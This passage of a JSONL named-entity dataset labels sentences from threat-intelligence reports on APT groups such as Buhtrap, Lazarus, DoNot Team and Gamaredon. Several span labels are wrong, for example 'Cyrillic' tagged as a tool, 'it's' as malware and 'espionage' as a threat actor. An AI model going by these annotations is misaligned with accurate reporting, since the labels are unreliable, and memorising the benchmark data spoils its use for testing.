Kaspersky Lab products as Exploit.Java.CVE-2012-3213.b .", "spans": {"VULNERABILITY: Flash exploits": [[11, 25]], "VULNERABILITY: Java zero-day": [[95, 108]], "ORGANIZATION: Kaspersky Lab": [[168, 181]], "VULNERABILITY: Exploit.Java.CVE-2012-3213.b": [[194, 222]]}, "info": {"id": "dnrti_train_002470", "source": "dnrti_train"}} {"text": "The victims for the 2014-2015 versions are generally IT and real estate/investment companies and in both cases , a small number of computers have been infected throughout Wild Neutron .", "spans": {"ORGANIZATION: IT": [[53, 55]], "ORGANIZATION: real estate/investment companies": [[60, 92]], "THREAT_ACTOR: Wild Neutron": [[171, 183]]}, "info": {"id": "dnrti_train_002471", "source": "dnrti_train"}} {"text": "Wild Neutron 's targeting of major IT companies , spyware 
developers ( FlexiSPY ) , jihadist forums ( the \" Ansar Al-Mujahideen English Forum \" ) and Bitcoin companies indicate a flexible yet unusual mindset and interests .", "spans": {"THREAT_ACTOR: Wild Neutron": [[0, 12]], "ORGANIZATION: IT companies": [[35, 47]], "ORGANIZATION: spyware developers": [[50, 68]], "ORGANIZATION: FlexiSPY": [[71, 79]], "ORGANIZATION: jihadist forums": [[84, 99]], "ORGANIZATION: Ansar Al-Mujahideen English Forum": [[108, 141]], "ORGANIZATION: Bitcoin companies": [[150, 167]]}, "info": {"id": "dnrti_train_002472", "source": "dnrti_train"}} {"text": "We continue to track the Wild Neutron group , which is still active as of June 2015 .", "spans": {"THREAT_ACTOR: Wild Neutron group": [[25, 43]]}, "info": {"id": "dnrti_train_002473", "source": "dnrti_train"}} {"text": "A ransomware variant dubbed PyLocky was observed in September 2018 being distributed by a phishing campaign using an invoicing theme .", "spans": {"TOOL: PyLocky": [[28, 35]]}, "info": {"id": "dnrti_train_002474", "source": "dnrti_train"}} {"text": "PyLocky was found to be targeting entities in France and Germany .", "spans": {"TOOL: PyLocky": [[0, 7]]}, "info": {"id": "dnrti_train_002475", "source": "dnrti_train"}} {"text": "Fxmsp specialize in breaching highly secure protected networks to access private corporate and government information .", "spans": {"THREAT_ACTOR: Fxmsp": [[0, 5]]}, "info": {"id": "dnrti_train_002476", "source": "dnrti_train"}} {"text": "Fxmsp is a hacking collective that has operated in various top-tier Russian- and English-speaking underground communities since 2017 .", "spans": {"THREAT_ACTOR: Fxmsp": [[0, 5]]}, "info": {"id": "dnrti_train_002477", "source": "dnrti_train"}} {"text": "Throughout 2017 and 2018 , Fxmsp established a network of trusted proxy resellers to promote their breaches on the criminal underground .", "spans": {"THREAT_ACTOR: Fxmsp": [[27, 32]]}, "info": {"id": "dnrti_train_002478", "source": "dnrti_train"}} {"text": "On April 24 , 
2019 , Fxmsp claimed to have secured access to three leading antivirus companies .", "spans": {"THREAT_ACTOR: Fxmsp": [[21, 26]], "ORGANIZATION: antivirus companies": [[75, 94]]}, "info": {"id": "dnrti_train_002479", "source": "dnrti_train"}} {"text": "According to the Fxmsp , they worked tirelessly for the first quarter of 2019 to breach these companies and finally succeeded and obtained access to the companies' internal networks .", "spans": {}, "info": {"id": "dnrti_train_002480", "source": "dnrti_train"}} {"text": "Booz Allen Hamilton in 2014 and AhnLab in 2015 reported on Bisonal using a simple XOR cipher to hide the C2 address strings in the body . For example , Bisonal malware in 2012 used send() and recv() APIs to communicate with its C2 This Bisonal variant used in the latest attack communicates with one of the following hard-coded C2 addresses by using the HTTP POST method on TCP port 443 .", "spans": {"ORGANIZATION: Booz Allen Hamilton": [[0, 19]], "ORGANIZATION: AhnLab": [[32, 38]], "THREAT_ACTOR: Bisonal malware": [[152, 167]], "MALWARE: Bisonal": [[236, 243]]}, "info": {"id": "dnrti_train_002481", "source": "dnrti_train"}} {"text": "Previous reports have discussed Bisonal malware used in attacks against Japan , South Korea and Russia .", "spans": {"MALWARE: Bisonal malware": [[32, 47]]}, "info": {"id": "dnrti_train_002482", "source": "dnrti_train"}} {"text": "This particular sample we found targeted an organization in Russia and there is a specific system language check for Cyrillic and no others .", "spans": {"MALWARE: sample": [[16, 22]]}, "info": {"id": "dnrti_train_002483", "source": "dnrti_train"}} {"text": "If it's Cyrillic and the command to the shell is not ‘ipconfig’ , the threat converts the command result text encoding from Cyrillic to UTF-16 .", "spans": {"MALWARE: it's": [[3, 7]], "TOOL: Cyrillic": [[8, 16]], "TOOL: UTF-16": [[136, 142]]}, "info": {"id": "dnrti_train_002484", "source": "dnrti_train"}} {"text": "Similar to the Bisonal 
variant targeting the Russian organization , this sample was also disguised as PDF document .", "spans": {"MALWARE: Bisonal": [[15, 22]]}, "info": {"id": "dnrti_train_002485", "source": "dnrti_train"}} {"text": "The contents of the decoy PDF is a job descriptions with the South Korean Coast Guard .", "spans": {"MALWARE: the decoy PDF": [[16, 29]]}, "info": {"id": "dnrti_train_002486", "source": "dnrti_train"}} {"text": "The installed EXE file is almost exactly the same as the DLL version of Bisonal variant used against the Russian organization .", "spans": {"MALWARE: installed EXE file": [[4, 22]], "MALWARE: Bisonal variant": [[72, 87]]}, "info": {"id": "dnrti_train_002487", "source": "dnrti_train"}} {"text": "The targets are military or defense industry in particular countries , it used DDNS for C2 servers , and tracked connections from their victims by using target or campaign codes , as well as disguising the malware as document file , and using a dropper to install the malware and decoy file .", "spans": {"TOOL: dropper": [[245, 252]]}, "info": {"id": "dnrti_train_002488", "source": "dnrti_train"}} {"text": "A previous campaign of this APT group was uncovered by Talos in June 2017 , and since then very little of this operation was seen in the wild .", "spans": {"ORGANIZATION: Talos": [[55, 60]]}, "info": {"id": "dnrti_train_002489", "source": "dnrti_train"}} {"text": "ined in the archive is called DriverInstallerU.exe” but its metadata shows that its original name is Interenet Assistant.exe” .", "spans": {"MALWARE: DriverInstallerU.exe”": [[30, 51]], "MALWARE: Interenet Assistant.exe”": [[101, 125]]}, "info": {"id": "dnrti_train_002490", "source": "dnrti_train"}} {"text": "After reviewing all the malware functionalities , we are confident in saying that the attackers look for victims who answer well-defined characteristics and believe that further stages of the attack are delivered only to those who fit the specific victim profile .", "spans": {"THREAT_ACTOR: 
attackers": [[86, 95]], "ORGANIZATION: victims who answer": [[105, 123]]}, "info": {"id": "dnrti_train_002491", "source": "dnrti_train"}} {"text": "In this sample , however , the module names were changed from actors and characters’ names to car models , namely BMW_x1” , BMW_x2” and up to BMW_x8” .", "spans": {"MALWARE: BMW_x1”": [[114, 121]], "MALWARE: BMW_x2”": [[124, 131]], "MALWARE: BMW_x8”": [[142, 149]]}, "info": {"id": "dnrti_train_002492", "source": "dnrti_train"}} {"text": "But , thanks to the attackers known affection for decoy documents that pose as news summaries , we were able to date the campaign back to March 2018 .", "spans": {"THREAT_ACTOR: attackers": [[20, 29]]}, "info": {"id": "dnrti_train_002493", "source": "dnrti_train"}} {"text": "With the experience gained from the APT attack that began in March 2017 , it seems this campaign has evolved into an attack with new capabilities , and an even more specific target , over a year later .", "spans": {}, "info": {"id": "dnrti_train_002494", "source": "dnrti_train"}} {"text": "These unknown actors continued launching DDoS attacks over the next few years .", "spans": {"THREAT_ACTOR: unknown actors": [[6, 20]]}, "info": {"id": "dnrti_train_002495", "source": "dnrti_train"}} {"text": "For simplicity , Kaspersky is calling them the BlackEnergy APT group .", "spans": {"ORGANIZATION: Kaspersky": [[17, 26]]}, "info": {"id": "dnrti_train_002496", "source": "dnrti_train"}} {"text": "Since the middle of 2015 , one of the preferred attack vectors for BlackEnergy in Ukraine has been Excel documents with macros that drop the Trojan to disk if the user chooses to run the script in the document .", "spans": {"THREAT_ACTOR: BlackEnergy": [[67, 78]]}, "info": {"id": "dnrti_train_002497", "source": "dnrti_train"}} {"text": "A very good analysis and overview of the BlackEnergy attacks in Ukraine throughout 2014 and 2015 was published by the Ukrainian security firm Cys Centrum the text is only available in Russian for now 
, but can be read via Google Translate .", "spans": {"ORGANIZATION: Cys Centrum": [[142, 153]]}, "info": {"id": "dnrti_train_002498", "source": "dnrti_train"}} {"text": "The earliest signs of destructive payloads with BlackEnergy go back as far as June 2014 .", "spans": {"THREAT_ACTOR: BlackEnergy": [[48, 59]]}, "info": {"id": "dnrti_train_002499", "source": "dnrti_train"}} {"text": "BlackEnergy is a highly dynamic threat actor and the current attacks in Ukraine indicate that destructive actions are on their main agenda , in addition to compromising industrial control installations and espionage activities .", "spans": {"THREAT_ACTOR: BlackEnergy": [[0, 11]]}, "info": {"id": "dnrti_train_002500", "source": "dnrti_train"}} {"text": "Kaspersky will continue to monitor the BlackEnergy attacks in Ukraine and update our readers with more data when available .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "THREAT_ACTOR: BlackEnergy": [[39, 50]]}, "info": {"id": "dnrti_train_002501", "source": "dnrti_train"}} {"text": "From Buhtrap perpetrating cybercrime for financial gain , its toolset has been expanded with malware used to conduct espionage in Eastern Europe and Central Asia .", "spans": {"THREAT_ACTOR: Buhtrap": [[5, 12]]}, "info": {"id": "dnrti_train_002502", "source": "dnrti_train"}} {"text": "Throughout our tracking , we've seen this group deploy its main backdoor as well as other tools against various victims , but June 2019 was the first time we saw the Buhtrap group use a zero-day exploit as part of a campaign .", "spans": {"ORGANIZATION: we've": [[26, 31]], "THREAT_ACTOR: this group": [[37, 47]], "THREAT_ACTOR: Buhtrap": [[166, 173]]}, "info": {"id": "dnrti_train_002503", "source": "dnrti_train"}} {"text": "In that case , we observed Buhtrap using a local privilege escalation exploit , CVE-2019-1132 , against one of its victims .", "spans": {"THREAT_ACTOR: Buhtrap": [[27, 34]], "VULNERABILITY: CVE-2019-1132": [[80, 93]]}, "info": {"id": "dnrti_train_002504", 
"source": "dnrti_train"}} {"text": "However , as the shift in targets occurred before the source code leak , we assess with high confidence that the same people behind the first Buhtrap malware attacks against businesses and banks are also involved in targeting governmental institutions .", "spans": {"THREAT_ACTOR: Buhtrap": [[142, 149]]}, "info": {"id": "dnrti_train_002505", "source": "dnrti_train"}} {"text": "When Buhtrap was targeting businesses , the decoy documents would typically be contracts or invoices .", "spans": {"THREAT_ACTOR: Buhtrap": [[5, 12]]}, "info": {"id": "dnrti_train_002506", "source": "dnrti_train"}} {"text": "The Buhtrap group is well known for its targeting of financial institutions and businesses in Russia .", "spans": {"THREAT_ACTOR: Buhtrap": [[4, 11]]}, "info": {"id": "dnrti_train_002507", "source": "dnrti_train"}} {"text": "Figure 2 is a typical example of a generic invoice the group used in a campaign in 2014 .", "spans": {"THREAT_ACTOR: group": [[55, 60]]}, "info": {"id": "dnrti_train_002508", "source": "dnrti_train"}} {"text": "When the group's focus shifted to banks , the decoy documents were related to banking system regulations or advisories from FinCERT , an organization created by the Russian government to provide help and guidance to its financial institutions .", "spans": {"THREAT_ACTOR: group's": [[9, 16]], "ORGANIZATION: FinCERT": [[124, 131]]}, "info": {"id": "dnrti_train_002509", "source": "dnrti_train"}} {"text": "We confirmed that this is a DarkHydrus Group's new attack targeting Middle East region .", "spans": {"THREAT_ACTOR: DarkHydrus": [[28, 38]]}, "info": {"id": "dnrti_train_002510", "source": "dnrti_train"}} {"text": "In July 2018 , Palo Alto disclosed DarkHydrus Group which showed its special interest to governments in Middle East .", "spans": {"ORGANIZATION: Palo Alto": [[15, 24]], "THREAT_ACTOR: DarkHydrus": [[35, 45]]}, "info": {"id": "dnrti_train_002511", "source": "dnrti_train"}} {"text": "Prior to that 
report , we published detail analysis on malware exploiting CVE-2018-8414 vulnerability (remote code execution in SettingContent-ms) , which is believed a work of DarkHydrus .", "spans": {"VULNERABILITY: CVE-2018-8414": [[74, 87]], "THREAT_ACTOR: DarkHydrus": [[177, 187]]}, "info": {"id": "dnrti_train_002512", "source": "dnrti_train"}} {"text": "However , the final payload is something that welivesecurity have never seen associated with Buhtrap .", "spans": {"ORGANIZATION: welivesecurity": [[46, 60]], "THREAT_ACTOR: Buhtrap": [[93, 100]]}, "info": {"id": "dnrti_train_002513", "source": "dnrti_train"}} {"text": "It's coincident that both 'darkhydrus' APT group name and ‘Williams’ user name in PDB path found in this Twitter user .", "spans": {"THREAT_ACTOR: 'darkhydrus'": [[26, 38]], "THREAT_ACTOR: ‘Williams’": [[58, 68]], "ORGANIZATION: Twitter user": [[105, 117]]}, "info": {"id": "dnrti_train_002514", "source": "dnrti_train"}} {"text": "In recent APT incidents , Dark Hydruns tend to adopt Office VBA macro instead of Office 0day vulnerability in the consideration of cost reduction .", "spans": {"THREAT_ACTOR: Dark Hydruns": [[26, 38]], "TOOL: Office VBA macro": [[53, 69]]}, "info": {"id": "dnrti_train_002515", "source": "dnrti_train"}} {"text": "ASERT uncovered a credential theft campaign we call LUCKY ELEPHANT where attackers masquerade as legitimate entities such as foreign government , telecommunications , and military .", "spans": {"ORGANIZATION: ASERT": [[0, 5]], "THREAT_ACTOR: LUCKY ELEPHANT": [[52, 66]]}, "info": {"id": "dnrti_train_002516", "source": "dnrti_train"}} {"text": "From at least February 2019 to present , the actors in the LUCKY ELEPHANT campaign copied webpages to mimic South Asian government websites as well as Microsoft Outlook 365 login pages and hosted them on their own doppelganger domains , presumably to trick victims into providing login credentials .", "spans": {"THREAT_ACTOR: LUCKY ELEPHANT": [[59, 73]], "ORGANIZATION: Microsoft 
Outlook": [[151, 168]]}, "info": {"id": "dnrti_train_002517", "source": "dnrti_train"}} {"text": "ASERT suspects that the Actors use phishing emails to lure victims to the doppelganger websites and entice users to enter their credentials .", "spans": {"ORGANIZATION: ASERT": [[0, 5]]}, "info": {"id": "dnrti_train_002518", "source": "dnrti_train"}} {"text": "It is important to note that one domain , yahoomail[.]cf is only associated with this group from February 2019 onward .", "spans": {"THREAT_ACTOR: group": [[86, 91]]}, "info": {"id": "dnrti_train_002519", "source": "dnrti_train"}} {"text": "In late 2018 , the domain was associated with a different APT group / campaign of Chinese origin .", "spans": {"THREAT_ACTOR: APT group": [[58, 67]]}, "info": {"id": "dnrti_train_002520", "source": "dnrti_train"}} {"text": "Based on our analysis into the activity , ASERT deems with moderate confidence that an Indian APT group is behind the LUCKY ELEPHANT campaign .", "spans": {"THREAT_ACTOR: Indian APT group": [[87, 103]]}, "info": {"id": "dnrti_train_002521", "source": "dnrti_train"}} {"text": "The targets are typical of known Indian APT activity and the infrastructure was previously used by an Indian APT group .", "spans": {"THREAT_ACTOR: APT group": [[109, 118]]}, "info": {"id": "dnrti_train_002522", "source": "dnrti_train"}} {"text": "DoNot Team has a history of heavily targeting Pakistan , in addition to other neighboring countries .", "spans": {"THREAT_ACTOR: DoNot Team": [[0, 10]]}, "info": {"id": "dnrti_train_002523", "source": "dnrti_train"}} {"text": "The 360 Intelligence Center observed four distinct campaigns against Pakistan since 2017 (link) , recently targeting Pakistani businessmen working in China .", "spans": {"ORGANIZATION: Pakistani businessmen": [[117, 138]]}, "info": {"id": "dnrti_train_002524", "source": "dnrti_train"}} {"text": "DoNot Team’s confirmed use of this IP dates back to September 2018 , with a six-month gap until it was used to host 
doppelganger domains for the LUCKY ELEPHANT campaign in early February .", "spans": {"THREAT_ACTOR: DoNot": [[0, 5]]}, "info": {"id": "dnrti_train_002525", "source": "dnrti_train"}} {"text": "One of the IP addresses , 128.127.105.13 , was previously used by the DoNot Team (aka APT-C-35) , a suspected Indian APT group .", "spans": {"THREAT_ACTOR: DoNot Team": [[70, 80]]}, "info": {"id": "dnrti_train_002526", "source": "dnrti_train"}} {"text": "The actors behind LUCKY ELEPHANT recognize the effectiveness and use doppelganger webpages nearly identical to legitimate sites , enticing users to input their credentials .", "spans": {"THREAT_ACTOR: LUCKY ELEPHANT": [[18, 32]], "TOOL: doppelganger webpages": [[69, 90]]}, "info": {"id": "dnrti_train_002527", "source": "dnrti_train"}} {"text": "The heavier targeting in Pakistan adheres to historical targeting and the ongoing tension between the two countries , which has escalated since a terrorist attack in Kashmir on 14 February 2019 .", "spans": {}, "info": {"id": "dnrti_train_002528", "source": "dnrti_train"}} {"text": "The targeting of Pakistan , Bangladesh , Sri Lanka , Maldives , Myanmar , Nepal , and the Shanghai Cooperation Organization are all historical espionage targets by India .", "spans": {"THREAT_ACTOR: espionage": [[143, 152]]}, "info": {"id": "dnrti_train_002529", "source": "dnrti_train"}} {"text": "However , it is clear is that Donot are actively establishing infrastructure and are targeting governments in South Asia .", "spans": {"THREAT_ACTOR: Donot": [[30, 35]]}, "info": {"id": "dnrti_train_002530", "source": "dnrti_train"}} {"text": "First attack of this campaign took place in May 2018 .", "spans": {}, "info": {"id": "dnrti_train_002531", "source": "dnrti_train"}} {"text": "Arbor also published APT research on this group , and named it ‘Donot’ .", "spans": {"ORGANIZATION: Arbor": [[0, 5]], "THREAT_ACTOR: ‘Donot’": [[63, 70]]}, "info": {"id": "dnrti_train_002532", "source": "dnrti_train"}} {"text": "Donot 
attacked government agencies , aiming for classified intelligence .", "spans": {"THREAT_ACTOR: Donot": [[0, 5]]}, "info": {"id": "dnrti_train_002533", "source": "dnrti_train"}} {"text": "We identified this APT group coded as ‘APT-C-35’ in 2017 , who is mainly targeting Pakistan and other South Asian countries for cyber espionage .", "spans": {"THREAT_ACTOR: ‘APT-C-35’": [[38, 48]]}, "info": {"id": "dnrti_train_002534", "source": "dnrti_train"}} {"text": "At least 4 attack campaigns against Pakistan have been observed by us since 2017 .", "spans": {}, "info": {"id": "dnrti_train_002535", "source": "dnrti_train"}} {"text": "Spear phishing emails with vulnerable Office documents or malicious macros are sent to victims .", "spans": {"TOOL: Spear phishing": [[0, 14]]}, "info": {"id": "dnrti_train_002536", "source": "dnrti_train"}} {"text": "In the latest attack , Donot group is targeting Pakistani businessman working in China .", "spans": {"THREAT_ACTOR: Donot group": [[23, 34]], "ORGANIZATION: Pakistani businessman": [[48, 69]]}, "info": {"id": "dnrti_train_002537", "source": "dnrti_train"}} {"text": "Two unique malware frameworks , EHDevel and yty , are developed by attackers .", "spans": {"TOOL: EHDevel": [[32, 39]], "TOOL: yty": [[44, 47]], "THREAT_ACTOR: attackers": [[67, 76]]}, "info": {"id": "dnrti_train_002538", "source": "dnrti_train"}} {"text": "Furthermore , it has similar code logic as previous ones wuaupdt.exe in this attack appears in previous Donot attack , and C2 addresses are same to previous ones .", "spans": {"MALWARE: wuaupdt.exe": [[57, 68]]}, "info": {"id": "dnrti_train_002540", "source": "dnrti_train"}} {"text": "From the attack activity captured this time , it is obvious that Donot APT group is still keen on Pakistan as primary target of attack , and even expands scope of attack to include Pakistani staffs and institutions in China .", "spans": {"THREAT_ACTOR: Donot APT group": [[65, 80]]}, "info": {"id": "dnrti_train_002541", "source": 
"dnrti_train"}} {"text": "Buhtrap still make extensive use of NSIS installers as droppers and these are mainly delivered through malicious documents .", "spans": {"THREAT_ACTOR: Buhtrap": [[0, 7]], "THREAT_ACTOR: NSIS installers": [[36, 51]]}, "info": {"id": "dnrti_train_002542", "source": "dnrti_train"}} {"text": "They first came to light in 2016 , when they managed to steal sensitive information from the US Democratic National Committee (DNC) .", "spans": {}, "info": {"id": "dnrti_train_002543", "source": "dnrti_train"}} {"text": "Earworm first came to light in 2016 , when they managed to steal sensitive information from the US Democratic National Committee (DNC) .", "spans": {"THREAT_ACTOR: Earworm": [[0, 7]]}, "info": {"id": "dnrti_train_002544", "source": "dnrti_train"}} {"text": "They were also behind an attack on the World Anti-Doping Agency (WADA) , in which they leaked confidential information about several drug tests .", "spans": {"THREAT_ACTOR: They": [[0, 4]]}, "info": {"id": "dnrti_train_002545", "source": "dnrti_train"}} {"text": "SPLM , GAMEFISH , and Zebrocy delivery all maintain their own clusters , but frequently overlap later .", "spans": {"THREAT_ACTOR: SPLM": [[0, 4]], "THREAT_ACTOR: GAMEFISH": [[7, 15]], "THREAT_ACTOR: Zebrocy": [[22, 29]]}, "info": {"id": "dnrti_train_002546", "source": "dnrti_train"}} {"text": "Our previous post on Sofacy's 2017 activity stepped away from the previously covered headline buzz presenting their association with previously known political hacks and interest in Europe and the US , and examines their under-reported ongoing activity in middle east , central asia , and now a shift in targeting further east , including China , along with an overlap surprise .", "spans": {"THREAT_ACTOR: Sofacy's": [[21, 29]]}, "info": {"id": "dnrti_train_002547", "source": "dnrti_train"}} {"text": "The larger , 300kb+ SPLM backdoors deployed in 2016 and 2017 are not observed any longer at targets in 2018 .", "spans": {"THREAT_ACTOR: 
SPLM": [[20, 24]]}, "info": {"id": "dnrti_train_002548", "source": "dnrti_train"}} {"text": "A previous , removed , report from another vendor claimed non-specific information about the groups' interest in Chinese universities , but that report has been removed – most likely detections were related to students’ and researchers’ scanning known collected samples and any incidents” remain unconfirmed and unknown .", "spans": {"THREAT_ACTOR: groups'": [[93, 100]], "ORGANIZATION: Chinese universities": [[113, 133]]}, "info": {"id": "dnrti_train_002549", "source": "dnrti_train"}} {"text": "Either way , the group's consistent activity throughout central and eastern asia seems to be poorly represented in the public discussion .", "spans": {"THREAT_ACTOR: group's": [[17, 24]]}, "info": {"id": "dnrti_train_002550", "source": "dnrti_train"}} {"text": "The actors behind this campaign we call LUCKY ELEPHANT use doppelganger webpages to mimic legitimate entities such as foreign governments , telecommunications , and military .", "spans": {"THREAT_ACTOR: LUCKY ELEPHANT": [[40, 54]], "TOOL: doppelganger webpages": [[59, 80]]}, "info": {"id": "dnrti_train_002551", "source": "dnrti_train"}} {"text": "Currently , Sofacy targets large air-defense related commercial organizations in China with SPLM , and moves Zebrocy focus across Armenia , Turkey , Kazahkstan , Tajikistan , Afghanistan , Mongolia , China , and Japan .", "spans": {}, "info": {"id": "dnrti_train_002552", "source": "dnrti_train"}} {"text": "Either way , Sofacy's consistent activity throughout central and eastern asia seems to be poorly represented in the public discussion .", "spans": {"THREAT_ACTOR: Sofacy's": [[13, 21]]}, "info": {"id": "dnrti_train_002553", "source": "dnrti_train"}} {"text": "According to this new alert , Hidden Cobra the U.S government’s code name for Lazarus has been conducting FASTCash attacks stealing money from Automated Teller Machines (ATMs) from banks in Asia and Africa since at least 2016 .", 
"spans": {"THREAT_ACTOR: Hidden Cobra": [[30, 42]]}, "info": {"id": "dnrti_train_002554", "source": "dnrti_train"}} {"text": "Lazarus is a very active attack group involved in both cyber crime and espionage .", "spans": {"THREAT_ACTOR: Lazarus": [[0, 7]]}, "info": {"id": "dnrti_train_002555", "source": "dnrti_train"}} {"text": "The group was initially known for its espionage operations and a number of high-profile disruptive attacks , including the 2014 attack on Sony Pictures .", "spans": {"THREAT_ACTOR: group": [[4, 9]]}, "info": {"id": "dnrti_train_002556", "source": "dnrti_train"}} {"text": "Following US-CERTs report , Symantec's research uncovered the key component used in Lazarus's recent wave of financial attacks .", "spans": {"THREAT_ACTOR: Lazarus's": [[84, 93]]}, "info": {"id": "dnrti_train_002557", "source": "dnrti_train"}} {"text": "More recently , Lazarus has also become involved in financially motivated attacks , including an US$81 million dollar theft from the Bangladesh Central Bank and the WannaCry ransomware .", "spans": {"THREAT_ACTOR: Lazarus": [[16, 23]], "TOOL: WannaCry": [[165, 173]]}, "info": {"id": "dnrti_train_002558", "source": "dnrti_train"}} {"text": "Other open source and semi-legitimate pen-testing tools like nbtscan and powercat are being used for mapping available resources and lateral movement as well .", "spans": {"MALWARE: nbtscan": [[61, 68]], "MALWARE: powercat": [[73, 81]]}, "info": {"id": "dnrti_train_002559", "source": "dnrti_train"}} {"text": "To make the fraudulent withdrawals , Lazarus first breaches targeted banks' networks and compromises the switch application servers handling ATM transactions .", "spans": {"THREAT_ACTOR: Lazarus": [[37, 44]]}, "info": {"id": "dnrti_train_002560", "source": "dnrti_train"}} {"text": "The operation , known as FASTCash” has enabled Lazarus to fraudulently empty ATMs of cash .", "spans": {"THREAT_ACTOR: Lazarus": [[47, 54]]}, "info": {"id": "dnrti_train_002561", "source": "dnrti_train"}} 
{"text": "In order to permit their fraudulent withdrawals from ATMs , Lazarus inject a malicious Advanced Interactive eXecutive (AIX) executable into a running , legitimate process on the switch application server of a financial transaction network , in this case a network handling ATM transactions .", "spans": {"THREAT_ACTOR: Lazarus": [[60, 67]], "TOOL: (AIX)": [[118, 123]]}, "info": {"id": "dnrti_train_002562", "source": "dnrti_train"}} {"text": "It was previously believed that the attackers used scripts to manipulate legitimate software on the server into enabling the fraudulent activity .", "spans": {"THREAT_ACTOR: attackers": [[36, 45]], "TOOL: scripts": [[51, 58]]}, "info": {"id": "dnrti_train_002563", "source": "dnrti_train"}} {"text": "In recent years , Lazarus has also become involved in financially motivated attacks .", "spans": {"THREAT_ACTOR: Lazarus": [[18, 25]]}, "info": {"id": "dnrti_train_002564", "source": "dnrti_train"}} {"text": "This malware in turn intercepts fraudulent Lazarus cash withdrawal requests and sends fake approval responses , allowing the attackers to steal cash from ATMs .", "spans": {"TOOL: malware": [[5, 12]], "THREAT_ACTOR: Lazarus": [[43, 50]]}, "info": {"id": "dnrti_train_002565", "source": "dnrti_train"}} {"text": "Lazarus was linked to the $81 million theft from the Bangladesh central bank in 2016 , along with a number of other bank heists .", "spans": {"THREAT_ACTOR: Lazarus": [[0, 7]]}, "info": {"id": "dnrti_train_002566", "source": "dnrti_train"}} {"text": "Lazarus was also linked to the WannaCry ransomware outbreak in May 2017 .", "spans": {"THREAT_ACTOR: Lazarus": [[0, 7]]}, "info": {"id": "dnrti_train_002567", "source": "dnrti_train"}} {"text": "WannaCry incorporated the leaked EternalBlue exploit that used two known vulnerabilities in Windows CVE-2017-0144 and CVE-2017-0145 to turn the ransomware into a worm , capable of spreading itself to any unpatched computers on the victim's network and also to other vulnerable 
computers connected to the internet .", "spans": {"VULNERABILITY: CVE-2017-0144": [[100, 113]], "VULNERABILITY: CVE-2017-0145": [[118, 131]]}, "info": {"id": "dnrti_train_002568", "source": "dnrti_train"}} {"text": "Lazarus was initially known for its involvement in espionage operations and a number of high-profile disruptive attacks , including the 2014 attack on Sony Pictures that saw large amounts of information being stolen and computers wiped by malware .", "spans": {"THREAT_ACTOR: Lazarus": [[0, 7]]}, "info": {"id": "dnrti_train_002569", "source": "dnrti_train"}} {"text": "In short , Lazarus continues to pose a serious threat to the financial sector and organizations should take all necessary steps to ensure that their payment systems are fully up to date and secured .", "spans": {"THREAT_ACTOR: Lazarus": [[11, 18]]}, "info": {"id": "dnrti_train_002570", "source": "dnrti_train"}} {"text": "As with the 2016 series of virtual bank heists , including the Bangladesh Bank heist , FASTCash illustrates that Lazarus possesses an in-depth knowledge of banking systems and transaction processing protocols and has the expertise to leverage that knowledge in order to steal large sums from vulnerable banks .", "spans": {"ORGANIZATION: FASTCash": [[87, 95]], "THREAT_ACTOR: Lazarus": [[113, 120]]}, "info": {"id": "dnrti_train_002571", "source": "dnrti_train"}} {"text": "The attack , which starts with a malicious attachment disguised as a top secret US document , weaponizes TeamViewer , the popular remote access and desktop sharing software , to gain full control of the infected computer .", "spans": {"THREAT_ACTOR: attack": [[4, 10]], "TOOL: TeamViewer": [[105, 115]]}, "info": {"id": "dnrti_train_002572", "source": "dnrti_train"}} {"text": "It is hard to tell if there are geopolitical motives behind this campaign by looking solely at the list of countries it was targeting , since it was not after a specific region and the victims came from different places in the world .", 
"spans": {}, "info": {"id": "dnrti_train_002574", "source": "dnrti_train"}} {"text": "The initial infection vector used by the threat actor also changed over time , during 2018 we have seen multiple uses of self-extracting archives instead of malicious documents with AutoHotKey , which displayed a decoy image to the user .", "spans": {"TOOL: archives": [[137, 145]], "THREAT_ACTOR: AutoHotKey": [[182, 192]], "TOOL: decoy image": [[213, 224]]}, "info": {"id": "dnrti_train_002575", "source": "dnrti_train"}} {"text": "The recent wave of FASTCash attacks demonstrates that financially motivated attacks are not simply a passing interest for the Lazarus group and can now be considered one of its core activities .", "spans": {"THREAT_ACTOR: Lazarus group": [[126, 139]]}, "info": {"id": "dnrti_train_002576", "source": "dnrti_train"}} {"text": "Although both examples of the different delivery methods described above show an exclusive targeting of Russian speakers , the recurring financial and political themes that they use highlight the attacker's interest in the financial world once more .", "spans": {"THREAT_ACTOR: attacker's": [[196, 206]]}, "info": {"id": "dnrti_train_002577", "source": "dnrti_train"}} {"text": "Throughout our investigation , we have found evidence that shows operational similarities between this implant and Gamaredon Group .", "spans": {"MALWARE: implant": [[103, 110]], "THREAT_ACTOR: Gamaredon": [[115, 124]]}, "info": {"id": "dnrti_train_002578", "source": "dnrti_train"}} {"text": "Gamaredon Group is an alleged Russian threat group .", "spans": {"THREAT_ACTOR: Gamaredon Group": [[0, 15]]}, "info": {"id": "dnrti_train_002579", "source": "dnrti_train"}} {"text": "Gamaredon Group has been active since at least 2013 , and has targeted individuals likely involved with the Ukrainian government .", "spans": {"THREAT_ACTOR: Gamaredon Group": [[0, 15]]}, "info": {"id": "dnrti_train_002580", "source": "dnrti_train"}} {"text": "EvilGnome's functionalities include 
desktop screenshots , file stealing , allowing capturing audio recording from the user’s microphone and the ability to download and execute further modules .", "spans": {"THREAT_ACTOR: EvilGnome's": [[0, 11]], "TOOL: desktop screenshots": [[36, 55]], "TOOL: file stealing": [[58, 71]], "TOOL: capturing audio recording": [[83, 108]]}, "info": {"id": "dnrti_train_002581", "source": "dnrti_train"}} {"text": "Gamaredon Group primarily makes use of Russian hosting providers in order to distribute its malware .", "spans": {"THREAT_ACTOR: Gamaredon Group": [[0, 15]], "TOOL: malware": [[92, 99]]}, "info": {"id": "dnrti_train_002582", "source": "dnrti_train"}} {"text": "Gamaredon Group's implants are characterized by the employment of information stealing tools — among them being screenshot and document stealers delivered via a SFX , and made to achieve persistence through a scheduled task .", "spans": {"THREAT_ACTOR: Gamaredon Group's": [[0, 17]], "TOOL: information stealing tools": [[66, 92]]}, "info": {"id": "dnrti_train_002583", "source": "dnrti_train"}} {"text": "Gamaredon Group infects victims using malicious attachments , delivered via spear phishing techniques .", "spans": {"THREAT_ACTOR: Gamaredon Group": [[0, 15]], "TOOL: malicious attachments": [[38, 59]]}, "info": {"id": "dnrti_train_002584", "source": "dnrti_train"}} {"text": "The techniques and modules employed by EvilGnome — that is the use of SFX , persistence with task scheduler and the deployment of information stealing tools—remind us of Gamaredon Group’s 